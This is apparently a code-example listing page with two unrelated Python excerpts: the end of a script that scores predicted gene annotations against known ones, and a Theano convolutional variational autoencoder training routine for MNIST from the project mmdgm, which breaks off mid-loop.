            gene_1_loc = gene_1.location_on(assembly_1)
            cord_a = cordinate(asm_id,gene_1_loc)      ## Use chromosome id+start+stop+strand as a string to determine uniqueness.
            if (cord_a not in a_gene) :
                a_gene.append(cord_a)

            ex_start = []
            ex_stop = []
            for mrna_1 in sorted(gene_1.mRNAs()) :
                mrna_1_loc = mrna_1.location_on(assembly_1)
                cord = cordinate(asm_id,mrna_1_loc)
                if (cord not in a_mrna) :
                    a_mrna.append(cord)
                    
                if (args.feature == "Exon") :
                    feat_1 = mrna_1.exons()
                    
                if (args.feature == "CDS") :
                    feat_1 = mrna_1.CDSs()
                    
                for exon_1 in sorted(feat_1) :
                    exon_1_loc = exon_1.location_on(assembly_1)
                    cord = cordinate(asm_id, exon_1_loc)
                    if (cord not in a_exons) :
                        a_exons.append(cord)
                    anno_exons.add(cord)

                    
                    ex_start.append(exon_1_loc.fmin)
                    ex_stop.append(exon_1_loc.fmax)
                    
            ex_start.sort()
            ex_stop.sort()
            if (len(ex_start) >= 1) :
                cds1 = asm_id + ":" + gene_1.id + ":" + str(ex_start[0]) + ":" + str(ex_stop[-1]) + ":" +  str(gene_1_loc.strand)
                
            else :
                cds1 = asm_id + ":" + gene_1.id + ":" + str(gene_1_loc.fmin) + ":" + str(gene_1_loc.fmax) + ":" +  str(gene_1_loc.strand)
                
                
            if (cord_a not in a_cd) :
                a_cds.append(cds1)
                a_cd.append(cord_a)
             
                    

        if (type(assembly_2) is int) :                     ##    If the chromosome is not found in prediected file, move to next chromosome.
            continue
        

        genes_2 = assembly_2.genes()                      ## All genes from predicted annotation.
        chr.append(asm_id)                                ## Append all found chromosome in a list.
        pred_exons = set()

        for gene_2 in sorted(genes_2) :                           ## Add unique gene, mrna , exon features from predicted annotation to get each predicted feature total count.  
            gene_2_loc = gene_2.location_on(assembly_2)
            cord_p = cordinate(asm_id, gene_2_loc)
            if (cord_p not in p_gene) :
                p_gene.append(cord_p)

            ex_start = []
            ex_stop = []
            
            for mrna_2 in sorted(gene_2.mRNAs()) :
                mrna_2_loc = mrna_2.location_on(assembly_2)
                cord = cordinate(asm_id, mrna_2_loc)
                if (cord not in p_mrna) :
                    p_mrna.append(cord)

                if (args.feature == "Exon") :
                    feat_2 = mrna_2.exons()
                    
                if (args.feature == "CDS") :
                    feat_2 = mrna_2.CDSs()
                    
                for exon_2 in sorted(feat_2) :
                    exon_2_loc = exon_2.location_on(assembly_2)
                    cord = cordinate(asm_id ,exon_2_loc)
                    pred_exons.add(cord)
                    if (cord not in p_exons) :
                        p_exons.append(cord)
                        
                    ex_start.append(exon_2_loc.fmin)
                    ex_stop.append(exon_2_loc.fmax)
                    
            ex_start.sort()
            ex_stop.sort()
            
            if (len(ex_start) >= 1) :   
                cds2 = asm_id  + ":" + gene_2.id + ":" + str(ex_start[0]) + ":" + str(ex_stop[-1]) + ":" + str(gene_2_loc.strand)
                
            else :
                cds2 = asm_id + ":" + gene_2.id + ":" + str(gene_2_loc.fmin) + ":" + str(gene_2_loc.fmax) + ":" +  str(gene_2_loc.strand)
                

            if (cord_p not in p_cd) :
                p_cds.append(cds2)
                p_cd.append(cord_p)

                    
        exon_pred_all.update(pred_exons.intersection(anno_exons)) # true exons
        
        
        for gene_2 in sorted(genes_2) :                                         ## From the predicted feature determine the true once. Iterate through each predicted gene sorted by cordinate
            gene_2_loc = gene_2.location_on(assembly_2)
            cord_g = cordinate(asm_id, gene_2_loc)
            
            if (cord_g in gene_true) :                                          ## To prevent duplication, check if the feature already exists in the set of truly predicted gene.
                continue
            
            ex_mrna2 = set()
            			
        
            for gene_1 in sorted(genes_1) :
                ex_mrna1 = set()
                gene_1_loc = gene_1.location_on(assembly_1)
                if (gene_1_loc.strand != gene_2_loc.strand) :
                    continue
                if (gene_2.overlaps_with(gene_1)) :
                    
                    for mrna_2 in sorted(gene_2.mRNAs()) :
                        if (args.feature == "Exon") :
                            feat_2 = mrna_2.exons()
                        if (args.feature == "CDS") :
                            feat_2 = mrna_2.CDSs()
                            
                        for exon_2 in sorted(feat_2) :
                            exon_2_loc = exon_2.location_on(assembly_2)
                            cord2 = cordinate(asm_id , exon_2_loc)
                            ex_mrna2.add(cord2)
                            
                    for mrna_1 in sorted(gene_1.mRNAs()) :
                        if (args.feature == "Exon") :
                            feat_1 = mrna_1.exons()
                    
                        if (args.feature == "CDS") :
                            feat_1 = mrna_1.CDSs()
                        
                        for exon_1 in sorted(feat_1) :
                            exon_1_loc = exon_1.location_on(assembly_1)
                            cord1 = cordinate(asm_id, exon_1_loc)
                            ex_mrna1.add(cord1)
                    
                    ex_union = ex_mrna1.union(ex_mrna2)
                    if (len(ex_union) ==  len(ex_mrna1) and len(ex_union) == len(ex_mrna2)) :
                        gene_true.add(cord_g)
                        true_file.write(gene_1.id+"\t"+gene_2.id+"\n")
                        break
          
    for asm_id in assemblies_2:                                                  ## Iterate through each chromosome from the predicted annotation
        if asm_id not in chr :
            assembly_2 = assemblies_2.get(asm_id,-1)                             ## Find that chromosome in the predicted gff file which is not found in known annotation
            genes_2 = assembly_2.genes()                                         ## Add  genes, mrna, exon features from predicted annotation to total predicted feature set.
            
            for gene_2 in sorted(genes_2) :
                gene_2_loc = gene_2.location_on(assembly_2)
                cord_p = cordinate(asm_id ,gene_2_loc)
                if (cord_p not in p_gene) :
                    p_gene.append(cord_p)

                ex_start = []
                ex_stop = []
                
                for mrna_2 in sorted(gene_2.mRNAs()) :
                    mrna_2_loc = mrna_2.location_on(assembly_2)
                    cord = cordinate(asm_id , mrna_2_loc)
                    if (cord not in p_mrna) :
                        p_mrna.append(cord)

                    if (args.feature == "Exon") :
                        feat_2 = mrna_2.exons()
                    if (args.feature == "CDS") :
                        feat_2 = mrna_2.CDSs()
                        
                    for exon_2 in sorted(feat_2) :
                        exon_2_loc = exon_2.location_on(assembly_2)
                        cord = cordinate(asm_id ,exon_2_loc)
                        if (cord not in p_exons) :
                            p_exons.append(cord)
                            
                
                        ex_start.append(exon_2_loc.fmin)
                        ex_stop.append(exon_2_loc.fmax)

                ex_start.sort()
                ex_stop.sort()
                if (len(ex_start) >= 1) :
                    cds2 = asm_id  + ":" + gene_2.id + ":" + str(ex_start[0]) + ":" + str(ex_stop[-1]) + ":" + str(gene_2_loc.strand)
                    
                else :
                    cds2 = asm_id + ":" + gene_2.id + ":" + str(gene_2_loc.fmin) + ":" + str(gene_2_loc.fmax) + ":" +  str(gene_2_loc.strand)
                    

                if (cord_p not in p_cd) :
                    p_cds.append(cds2)
                    p_cd.append(cord_p)
                            

    

    #Calculate SN/SP for bases 

    (a_base_val, p_base_val, true_base) = base_comparison(p_exons,a_exons)

    base_sn = (true_base/a_base_val) * 100                                 
    base_sp = (true_base/p_base_val) * 100


    #Calculate SN/SP for exons 
    annotated_exon = len(a_exons)
    predicted_exon = len(p_exons)
    true_pred_exon = len(exon_pred_all)
    
    exon_sn = (true_pred_exon/annotated_exon) * 100                                 
    exon_sp = (true_pred_exon/predicted_exon) * 100

    #Calculate SN/SP for genes 

    annotated_gene = len(a_gene)
    predicted_gene = len(p_gene)
    true_pred_gene = len(gene_true)

    
    gene_sn = (true_pred_gene/annotated_gene) * 100                                 
    gene_sp = (true_pred_gene/predicted_gene) * 100
    print("Feature\tKnown\tPredicted\tTrue_Predicted\tSN\tPPV\n")
    print("Gene\t"+str(annotated_gene)+"\t"+str(predicted_gene)+"\t"+str(true_pred_gene)+"\t"+str(gene_sn)+"\t"+str(gene_sp))
    print(args.feature+"\t"+str(annotated_exon)+"\t"+str(predicted_exon)+"\t"+str(true_pred_exon)+"\t"+str(exon_sn)+"\t"+str(exon_sp))
    print("Base\t"+str(a_base_val)+"\t"+str(p_base_val)+"\t"+str(true_base)+"\t"+str(base_sn)+"\t"+str(base_sp))
    
    out_file = args.output_dir + '/summary.txt'
    if not (os.path.exists(args.output_dir)) :
        sys.exit("Directory does not exist.")
    fout = open(out_file,'w')

    fout.write("Feature\tKnown\tPredicted\tTrue_Predicted\tSN\tPPV\n")
    fout.write("Gene\t"+str(annotated_gene)+"\t"+str(predicted_gene)+"\t"+str(true_pred_gene)+"\t"+str(gene_sn)+"\t"+str(gene_sp)+"\n")
    fout.write(args.feature+"\t"+str(annotated_exon)+"\t"+str(predicted_exon)+"\t"+str(true_pred_exon)+"\t"+str(exon_sn)+"\t"+str(exon_sp)+"\n")
    fout.write("Base\t"+str(a_base_val)+"\t"+str(p_base_val)+"\t"+str(true_base)+"\t"+str(base_sn)+"\t"+str(base_sp)+"\n\n")


    arr_pred = compare_cds(p_cds,a_cds,"pred")
    arr_known = compare_cds(a_cds,p_cds,"known")
    arr_pred_same = compare_cds(p_cds,p_cds,"pred_same")
    
    new_gene = arr_pred[2]
    gene_merge = arr_pred[3]
    gene_found = arr_pred[0]
    gene_opp = arr_pred[1]       
    gene_missing = arr_known[2]
    gene = arr_known[0]
    gene_opp_known = arr_known[1]
    gene_split = arr_known[3]
    gene_pred_overlap_opp = arr_pred_same[1]


            
    print ("1. No. of known gene : ",len(a_cds))
    print ("2. No. of predicted gene : ",len(p_cds))
    print ("3. No. of predicted gene overlapping  0 known gene (new gene): ",new_gene)
    print ("4. No. of predicted gene overlapping > 1 known gene (gene merge) : ",gene_merge)
    print ("5. No. of predicted gene overlaping 1 known gene : ",gene_found)
    print ("6. No. of predicted gene overlapping >= 1 known gene in opp strand : ",gene_opp)
    print ("7. No. of predicted gene overlapping  1 known gene (exact intron/exon boundaries) : ",true_pred_gene)
    print ("8. No. of predicted gene overlapping >= 1 predicted gene in opp strand : ",gene_pred_overlap_opp)
    
    print ("9. No. of known gene overlapping  0 predicted gene (gene missing): ",gene_missing)
    print ("10. No. of known gene overlapping > 1 predicted gene(gene split) : ",gene_split)
    print ("11. No. of known gene overlaping 1 predicted gene : ",gene)
    print ("12. No. of known gene overlapping >= 1 predicted gene in opp strand : ",gene_opp_known)

    
    out_file = args.output_dir + '/final_stats.txt'
    if not (os.path.exists(args.output_dir)) :
        sys.exit("Directory does not exist.")
    fout = open(out_file,'w')
    
    fout.write ("1. No. of known gene : " + str(len(a_cds)) + "\n")
    fout.write ("2. No. of predicted gene : " + str(len(p_cds)) + "\n")
    fout.write ("3. No. of predicted gene overlapping  0 known gene (new gene): " + str(new_gene) + "\n")
    fout.write ("4. No. of predicted gene overlapping > 1 known gene (gene merge) : " + str(gene_merge) + "\n")
    fout.write ("5. No. of predicted gene overlaping 1 known gene : " + str(gene_found) + "\n")
    fout.write ("6. No. of predicted gene overlapping >= 1 known gene in opp strand : " + str(gene_opp) + "\n")
    fout.write ("7. No. of predicted gene overlapping  1 known gene (exact intron/exon boundary) : " + str(true_pred_gene) + "\n")
    fout.write ("8. No. of predicted gene overlapping >= 1  predicted gene in opp strand : " + str(gene_pred_overlap_opp) + "\n")
    fout.write ("9. No. of known gene overlapping  0 predicted gene (gene missing): " + str(gene_missing) + "\n")
    fout.write ("10. No. of known gene overlapping > 1 predicted gene (gene_split): " + str(gene_split) + "\n")
    fout.write ("11. No. of known gene overlaping 1 predicted gene : " + str(gene) + "\n")
    fout.write ("12. No. of known gene overlapping >= 1 predicted gene in opp strand : " + str(gene_opp_known) + "\n")



    true_pred_file = args.output_dir + '/true_pred.txt'
    fout_true = open(true_pred_file,'w')
    for true_gene in gene_true :
        fout_true.write(true_gene+"\n")
    


    #Clean up
    delete_file = ['exon_1.bed','exon_2.bed','exon_1_merged.bed','exon_2_merged.bed','exon_1_2_intersect.bed']
    for f in delete_file :
        cmd = "rm " + args.output_dir + "/" + f
        os.system(cmd)

Example 150

Project: mmdgm
Source File: cva_6layer_mnist_60000.py
View license
def cva_6layer_dropout_mnist_60000(seed=0, dropout_flag=1, drop_inverses_flag=0, learning_rate=3e-4, predir=None, n_batch=144,
             dataset='mnist.pkl.gz', batch_size=500, nkerns=[20, 50], n_hidden=[500, 50]):

    """
    Implementation of convolutional VA
    """    
    #cp->cd->cpd->cd->c
    nkerns=[32, 32, 64, 64, 64]
    drops=[1, 0, 1, 0, 0]
    #skerns=[5, 3, 3, 3, 3]
    #pools=[2, 1, 1, 2, 1]
    #modes=['same']*5
    n_hidden=[500, 50]
    drop_inverses=[1,]
    # 28->12->12->5->5/5*5*64->500->50->500->5*5*64/5->5->12->12->28
    
    if dataset=='mnist.pkl.gz':
        dim_input=(28, 28)
        colorImg=False

    logdir = 'results/supervised/cva/mnist/cva_6layer_mnist_60000'+str(nkerns)+str(n_hidden)+'_'+str(learning_rate)+'_'
    if predir is not None:
        logdir +='pre_'
    if dropout_flag == 1:
        logdir += ('dropout_'+str(drops)+'_')
    if drop_inverses_flag==1:
        logdir += ('inversedropout_'+str(drop_inverses)+'_')
    logdir += str(int(time.time()))+'/'

    if not os.path.exists(logdir): os.makedirs(logdir)
    print 'logdir:', logdir, 'predir', predir
    print 'cva_6layer_mnist_60000', nkerns, n_hidden, seed, drops, drop_inverses, dropout_flag, drop_inverses_flag
    with open(logdir+'hook.txt', 'a') as f:
        print >>f, 'logdir:', logdir, 'predir', predir
        print >>f, 'cva_6layer_mnist_60000', nkerns, n_hidden, seed, drops, drop_inverses, dropout_flag, drop_inverses_flag

    datasets = datapy.load_data_gpu_60000(dataset, have_matrix=True)

    train_set_x, train_set_y, train_y_matrix = datasets[0]
    valid_set_x, valid_set_y, valid_y_matrix = datasets[1]
    test_set_x, test_set_y, test_y_matrix = datasets[2]

    # compute number of minibatches for training, validation and testing
    n_train_batches = train_set_x.get_value(borrow=True).shape[0] / batch_size
    n_valid_batches = valid_set_x.get_value(borrow=True).shape[0] / batch_size
    n_test_batches = test_set_x.get_value(borrow=True).shape[0] / batch_size

    ######################
    # BUILD ACTUAL MODEL #
    ######################
    print '... building the model'

    # allocate symbolic variables for the data
    index = T.lscalar()  # index to a [mini]batch
    x = T.matrix('x')  # the data is presented as rasterized images
    y = T.ivector('y')  # the labels are presented as 1D vector of
                        # [int] labels
    random_z = T.matrix('random_z')

    drop = T.iscalar('drop')
    drop_inverse = T.iscalar('drop_inverse')
    
    activation = nonlinearity.relu

    rng = np.random.RandomState(seed)
    rng_share = theano.tensor.shared_randomstreams.RandomStreams(0)
    input_x = x.reshape((batch_size, 1, 28, 28))
    
    recg_layer = []
    cnn_output = []

    #1
    recg_layer.append(ConvMaxPool.ConvMaxPool(
            rng,
            image_shape=(batch_size, 1, 28, 28),
            filter_shape=(nkerns[0], 1, 5, 5),
            poolsize=(2, 2),
            border_mode='valid',
            activation=activation
        ))
    if drops[0]==1:
        cnn_output.append(recg_layer[-1].drop_output(input=input_x, drop=drop, rng=rng_share))
    else:
        cnn_output.append(recg_layer[-1].output(input=input_x))

    #2
    recg_layer.append(ConvMaxPool.ConvMaxPool(
        rng,
        image_shape=(batch_size, nkerns[0], 12, 12),
        filter_shape=(nkerns[1], nkerns[0], 3, 3),
        poolsize=(1, 1),
        border_mode='same', 
        activation=activation
    ))
    if drops[1]==1:
        cnn_output.append(recg_layer[-1].drop_output(cnn_output[-1], drop=drop, rng=rng_share))
    else:
        cnn_output.append(recg_layer[-1].output(cnn_output[-1]))
    
    #3
    recg_layer.append(ConvMaxPool.ConvMaxPool(
        rng,
        image_shape=(batch_size, nkerns[1], 12, 12),
        filter_shape=(nkerns[2], nkerns[1], 3, 3),
        poolsize=(2, 2),
        border_mode='valid', 
        activation=activation
    ))
    if drops[2]==1:
        cnn_output.append(recg_layer[-1].drop_output(cnn_output[-1], drop=drop, rng=rng_share))
    else:
        cnn_output.append(recg_layer[-1].output(cnn_output[-1]))

    #4
    recg_layer.append(ConvMaxPool.ConvMaxPool(
        rng,
        image_shape=(batch_size, nkerns[2], 5, 5),
        filter_shape=(nkerns[3], nkerns[2], 3, 3),
        poolsize=(1, 1),
        border_mode='same', 
        activation=activation
    ))
    if drops[3]==1:
        cnn_output.append(recg_layer[-1].drop_output(cnn_output[-1], drop=drop, rng=rng_share))
    else:
        cnn_output.append(recg_layer[-1].output(cnn_output[-1]))
    #5
    recg_layer.append(ConvMaxPool.ConvMaxPool(
        rng,
        image_shape=(batch_size, nkerns[3], 5, 5),
        filter_shape=(nkerns[4], nkerns[3], 3, 3),
        poolsize=(1, 1),
        border_mode='same', 
        activation=activation
    ))
    if drops[4]==1:
        cnn_output.append(recg_layer[-1].drop_output(cnn_output[-1], drop=drop, rng=rng_share))
    else:
        cnn_output.append(recg_layer[-1].output(cnn_output[-1]))

    mlp_input_x = cnn_output[-1].flatten(2)

    activations = []

    #1
    recg_layer.append(FullyConnected.FullyConnected(
            rng=rng,
            n_in= 5 * 5 * nkerns[-1],
            n_out=n_hidden[0],
            activation=activation
        ))
    if drops[-1]==1:
        activations.append(recg_layer[-1].drop_output(input=mlp_input_x, drop=drop, rng=rng_share))
    else:
        activations.append(recg_layer[-1].output(input=mlp_input_x))

    #stochastic layer
    recg_layer.append(GaussianHidden.GaussianHidden(
            rng=rng,
            input=activations[-1],
            n_in=n_hidden[0],
            n_out = n_hidden[1],
            activation=None
        ))

    z = recg_layer[-1].sample_z(rng_share)


    gene_layer = []
    z_output = []
    random_z_output = []

    #1
    gene_layer.append(FullyConnected.FullyConnected(
            rng=rng,
            n_in=n_hidden[1],
            n_out = n_hidden[0],
            activation=activation
        ))
    
    z_output.append(gene_layer[-1].output(input=z))
    random_z_output.append(gene_layer[-1].output(input=random_z))

    #2
    gene_layer.append(FullyConnected.FullyConnected(
            rng=rng,
            n_in=n_hidden[0],
            n_out = 5*5*nkerns[-1],
            activation=activation
        ))

    if drop_inverses[0]==1:
        z_output.append(gene_layer[-1].drop_output(input=z_output[-1], drop=drop_inverse, rng=rng_share))
        random_z_output.append(gene_layer[-1].drop_output(input=random_z_output[-1], drop=drop_inverse, rng=rng_share))
    else:
        z_output.append(gene_layer[-1].output(input=z_output[-1]))
        random_z_output.append(gene_layer[-1].output(input=random_z_output[-1]))

    input_z = z_output[-1].reshape((batch_size, nkerns[-1], 5, 5))
    input_random_z = random_z_output[-1].reshape((n_batch, nkerns[-1], 5, 5))

    #1
    gene_layer.append(UnpoolConvNon.UnpoolConvNon(
            rng,
            image_shape=(batch_size, nkerns[-1], 5, 5),
            filter_shape=(nkerns[-2], nkerns[-1], 3, 3),
            poolsize=(1, 1),
            border_mode='same', 
            activation=activation
        ))
    
    z_output.append(gene_layer[-1].output(input=input_z))
    random_z_output.append(gene_layer[-1].output_random_generation(input=input_random_z, n_batch=n_batch))
    
    #2
    gene_layer.append(UnpoolConvNon.UnpoolConvNon(
            rng,
            image_shape=(batch_size, nkerns[-2], 5, 5),
            filter_shape=(nkerns[-3], nkerns[-2], 3, 3),
            poolsize=(2, 2),
            border_mode='full', 
            activation=activation
        ))
    
    z_output.append(gene_layer[-1].output(input=z_output[-1]))
    random_z_output.append(gene_layer[-1].output_random_generation(input=random_z_output[-1], n_batch=n_batch))

    #3
    gene_layer.append(UnpoolConvNon.UnpoolConvNon(
            rng,
            image_shape=(batch_size, nkerns[-3], 12, 12),
            filter_shape=(nkerns[-4], nkerns[-3], 3, 3),
            poolsize=(1, 1),
            border_mode='same', 
            activation=activation
        ))
    
    z_output.append(gene_layer[-1].output(input=z_output[-1]))
    random_z_output.append(gene_layer[-1].output_random_generation(input=random_z_output[-1], n_batch=n_batch))

    #4
    gene_layer.append(UnpoolConvNon.UnpoolConvNon(
            rng,
            image_shape=(batch_size, nkerns[-4], 12, 12),
            filter_shape=(nkerns[-5], nkerns[-4], 3, 3),
            poolsize=(1, 1),
            border_mode='same', 
            activation=activation
        ))
    
    z_output.append(gene_layer[-1].output(input=z_output[-1]))
    random_z_output.append(gene_layer[-1].output_random_generation(input=random_z_output[-1], n_batch=n_batch))

    #5 stochastic layer 
    # for the last layer, the nonliearity should be sigmoid to achieve mean of Bernoulli
    gene_layer.append(UnpoolConvNon.UnpoolConvNon(
            rng,
            image_shape=(batch_size, nkerns[-5], 12, 12),
            filter_shape=(1, nkerns[-5], 5, 5),
            poolsize=(2, 2),
            border_mode='full', 
            activation=nonlinearity.sigmoid
        ))

    z_output.append(gene_layer[-1].output(input=z_output[-1]))
    random_z_output.append(gene_layer[-1].output_random_generation(input=random_z_output[-1], n_batch=n_batch))
   
    gene_layer.append(NoParamsBernoulliVisiable.NoParamsBernoulliVisiable(
            #rng=rng,
            #mean=z_output[-1],
            #data=input_x,
        ))
    logpx = gene_layer[-1].logpx(mean=z_output[-1], data=input_x)


    # 4-D tensor of random generation
    random_x_mean = random_z_output[-1]
    random_x = gene_layer[-1].sample_x(rng_share, random_x_mean)

    #L = (logpx + logpz - logqz).sum()
    cost = (
        (logpx + recg_layer[-1].logpz - recg_layer[-1].logqz).sum()
    )
    
    px = (logpx.sum())
    pz = (recg_layer[-1].logpz.sum())
    qz = (- recg_layer[-1].logqz.sum())

    params=[]
    for g in gene_layer:
        params+=g.params
    for r in recg_layer:
        params+=r.params
    gparams = [T.grad(cost, param) for param in params]

    weight_decay=1.0/n_train_batches
    l_r = theano.shared(np.asarray(learning_rate, dtype=np.float32))
    #get_optimizer = optimizer.get_adam_optimizer(learning_rate=learning_rate)
    get_optimizer = optimizer.get_adam_optimizer_max(learning_rate=l_r, 
        decay1=0.1, decay2=0.001, weight_decay=weight_decay, epsilon=1e-8)
    with open(logdir+'hook.txt', 'a') as f:
        print >>f, 'AdaM', learning_rate, weight_decay
    updates = get_optimizer(params,gparams)

    # compiling a Theano function that computes the mistakes that are made
    # by the model on a minibatch
    test_model = theano.function(
        inputs=[index],
        outputs=cost,
        #outputs=layer[-1].errors(y),
        givens={
            x: test_set_x[index * batch_size:(index + 1) * batch_size],
            #y: test_set_y[index * batch_size:(index + 1) * batch_size],
            #y_matrix: test_y_matrix[index * batch_size: (index + 1) * batch_size],
            drop: np.cast['int32'](0),
            drop_inverse: np.cast['int32'](0)
        }
    )

    validate_model = theano.function(
        inputs=[index],
        outputs=cost,
        #outputs=layer[-1].errors(y),
        givens={
            x: valid_set_x[index * batch_size:(index + 1) * batch_size],
            #y: valid_set_y[index * batch_size:(index + 1) * batch_size],
            #y_matrix: valid_y_matrix[index * batch_size: (index + 1) * batch_size],
            drop: np.cast['int32'](0),
            drop_inverse: np.cast['int32'](0)
        }
    )
    
    '''
    Save parameters and activations
    '''

    parameters = theano.function(
        inputs=[],
        outputs=params,
    )

    train_activations = theano.function(
        inputs=[index],
        outputs=T.concatenate(activations, axis=1),
        givens={
            x: train_set_x[index * batch_size: (index + 1) * batch_size],
            drop: np.cast['int32'](0),
            #drop_inverse: np.cast['int32'](0)
            #y: train_set_y[index * batch_size: (index + 1) * batch_size]
        }
    )
    
    valid_activations = theano.function(
        inputs=[index],
        outputs=T.concatenate(activations, axis=1),
        givens={
            x: valid_set_x[index * batch_size: (index + 1) * batch_size],
            drop: np.cast['int32'](0),
            #drop_inverse: np.cast['int32'](0)
            #y: valid_set_y[index * batch_size: (index + 1) * batch_size]
        }
    )

    test_activations = theano.function(
        inputs=[index],
        outputs=T.concatenate(activations, axis=1),
        givens={
            x: test_set_x[index * batch_size: (index + 1) * batch_size],
            drop: np.cast['int32'](0),
            #drop_inverse: np.cast['int32'](0)
            #y: test_set_y[index * batch_size: (index + 1) * batch_size]
        }
    )

    # compiling a Theano function `train_model` that returns the cost, but
    # in the same time updates the parameter of the model based on the rules
    # defined in `updates`

    debug_model = theano.function(
        inputs=[index],
        outputs=[cost, px, pz, qz],
        #updates=updates,
        givens={
            x: train_set_x[index * batch_size: (index + 1) * batch_size],
            #y: train_set_y[index * batch_size: (index + 1) * batch_size],
            #y_matrix: train_y_matrix[index * batch_size: (index + 1) * batch_size],
            drop: np.cast['int32'](dropout_flag),
            drop_inverse: np.cast['int32'](drop_inverses_flag)
        }
    )

    random_generation = theano.function(
        inputs=[random_z],
        outputs=[random_x_mean.flatten(2), random_x.flatten(2)],
        givens={
            #drop: np.cast['int32'](0),
            drop_inverse: np.cast['int32'](0)
        }
    )

    train_bound_without_dropout = theano.function(
        inputs=[index],
        outputs=cost,
        givens={
            x: train_set_x[index * batch_size: (index + 1) * batch_size],
            #y: train_set_y[index * batch_size: (index + 1) * batch_size],
            #y_matrix: train_y_matrix[index * batch_size: (index + 1) * batch_size],
            drop: np.cast['int32'](0),
            drop_inverse: np.cast['int32'](0)
        }
    )

    train_model = theano.function(
        inputs=[index],
        outputs=cost,
        updates=updates,
        givens={
            x: train_set_x[index * batch_size: (index + 1) * batch_size],
            #y: train_set_y[index * batch_size: (index + 1) * batch_size],
            #y_matrix: train_y_matrix[index * batch_size: (index + 1) * batch_size],
            drop: np.cast['int32'](dropout_flag),
            drop_inverse: np.cast['int32'](drop_inverses_flag)
        }
    )

    ##################
    # Pretrain MODEL #
    ##################
    if predir is not None:
        color.printBlue('... setting parameters')
        color.printBlue(predir)
        pre_train = np.load(predir+'model.npz')
        pre_train = pre_train['model']
        for (para, pre) in zip(params, pre_train):
            para.set_value(pre)
        tmp =  [debug_model(i) for i in xrange(n_train_batches)]
        tmp = (np.asarray(tmp)).mean(axis=0) / float(batch_size)
        print '------------------', tmp

    ###############
    # TRAIN MODEL #
    ###############
    print '... training'

    # early-stopping parameters
    patience = 10000  # look as this many examples regardless
    patience_increase = 2  # wait this much longer when a new best is
                           # found
    improvement_threshold = 0.995  # a relative improvement of this much is
                                   # considered significant
    validation_frequency = min(n_train_batches, patience / 2)
                                  # go through this many
                                  # minibatche before checking the network
                                  # on the validation set; in this case we
                                  # check every epoch

    best_validation_bound = -1000000.0
    best_iter = 0
    test_score = 0.
    start_time = time.clock()
    NaN_count = 0
    epoch = 0
    threshold = 0
    validation_frequency = 1
    generatition_frequency = 10
    if predir is not None:
        threshold = 0
    color.printRed('threshold, '+str(threshold) + 
        ' generatition_frequency, '+str(generatition_frequency)
        +' validation_frequency, '+str(validation_frequency))
    done_looping = False
    n_epochs = 600
    decay_epochs = 500

    '''
    print 'test initialization...'
    pre_model = parameters()
    for i in xrange(len(pre_model)):
        pre_model[i] = np.asarray(pre_model[i])
        print pre_model[i].shape, np.mean(pre_model[i]), np.var(pre_model[i])
    print 'end test...'
    '''
    while (epoch < n_epochs) and (not done_looping):
        epoch = epoch + 1
        minibatch_avg_cost = 0
        
        tmp_start1 = time.clock()

        test_epoch = epoch - decay_epochs
        if test_epoch > 0 and test_epoch % 10 == 0:
            print l_r.get_value()
            with open(logdir+'hook.txt', 'a') as f:
                print >>f,l_r.get_value()
            l_r.set_value(np.cast['float32'](l_r.get_value()/3.0))


        for minibatch_index in xrange(n_train_batches):
            #print minibatch_index
            '''
            color.printRed('lalala')
            xxx = dims(minibatch_index)
            print xxx.shape
            '''
            #print n_train_batches
            minibatch_avg_cost += train_model(minibatch_index)
            # iteration number
            iter = (epoch - 1) * n_train_batches + minibatch_index
        
        if math.isnan(minibatch_avg_cost):
            NaN_count+=1
            color.printRed("NaN detected. Reverting to saved best parameters")
            print '---------------NaN_count:', NaN_count
            with open(logdir+'hook.txt', 'a') as f:
                print >>f, '---------------NaN_count:', NaN_count
            
            tmp =  [debug_model(i) for i in xrange(n_train_batches)]
            tmp = (np.asarray(tmp)).mean(axis=0) / float(batch_size)
            print '------------------NaN check:', tmp
            with open(logdir+'hook.txt', 'a') as f:
               print >>f, '------------------NaN check:', tmp
               
            model = parameters()
            for i in xrange(len(model)):
                model[i] = np.asarray(model[i]).astype(np.float32)
                print model[i].shape, np.mean(model[i]), np.var(model[i])
                print np.max(model[i]), np.min(model[i])
                print np.all(np.isfinite(model[i])), np.any(np.isnan(model[i]))
                with open(logdir+'hook.txt', 'a') as f:
                    print >>f, model[i].shape, np.mean(model[i]), np.var(model[i])
                    print >>f, np.max(model[i]), np.min(model[i])
                    print >>f, np.all(np.isfinite(model[i])), np.any(np.isnan(model[i]))

            best_before = np.load(logdir+'model.npz')
            best_before = best_before['model']
            for (para, pre) in zip(params, best_before):
                para.set_value(pre)
            tmp =  [debug_model(i) for i in xrange(n_train_batches)]
            tmp = (np.asarray(tmp)).mean(axis=0) / float(batch_size)
            print '------------------', tmp
            return

        #print 'optimization_time', time.clock() - tmp_start1
        print epoch, 'stochastic training error', minibatch_avg_cost / float(n_train_batches*batch_size)
        with open(logdir+'hook.txt', 'a') as f:
            print >>f, epoch, 'stochastic training error', minibatch_avg_cost / float(n_train_batches*batch_size)

        if epoch % validation_frequency == 0:
            tmp_start2 = time.clock()

            test_losses = [test_model(i) for i
                                 in xrange(n_test_batches)]
            this_test_bound = np.mean(test_losses)/float(batch_size)
            
            #tmp =  [debug_model(i) for i
            #                     in xrange(n_train_batches)]
            #tmp = (np.asarray(tmp)).mean(axis=0) / float(batch_size)
            
            print epoch, 'test bound', this_test_bound
            #print tmp
            with open(logdir+'hook.txt', 'a') as f:
                print >>f, epoch, 'test bound', this_test_bound
            
        if epoch%100==0:    
            
            model = parameters()
            for i in xrange(len(model)):
                model[i] = np.asarray(model[i]).astype(np.float32)
            np.savez(logdir+'model-'+str(epoch), model=model)
            
            for i in xrange(n_train_batches):
                if i == 0:
                    train_features = np.asarray(train_activations(i))
                else:
                    train_features = np.vstack((train_features, np.asarray(train_activations(i))))
            
            for i in xrange(n_valid_batches):
                if i == 0:
                    valid_features = np.asarray(valid_activations(i))
                else:
                    valid_features = np.vstack((valid_features, np.asarray(valid_activations(i))))

            for i in xrange(n_test_batches):
                if i == 0:
                    test_features = np.asarray(test_activations(i))
                else:
                    test_features = np.vstack((test_features, np.asarray(test_activations(i))))
            np.save(logdir+'train_features', train_features)
            np.save(logdir+'valid_features', valid_features)
            np.save(logdir+'test_features', test_features)
        
        tmp_start4=time.clock()
        if epoch % generatition_frequency == 0:
            tail='-'+str(epoch)+'.png'
            random_z = np.random.standard_normal((n_batch, n_hidden[-1])).astype(np.float32)
            _x_mean, _x = random_generation(random_z)
            #print _x.shape
            #print _x_mean.shape
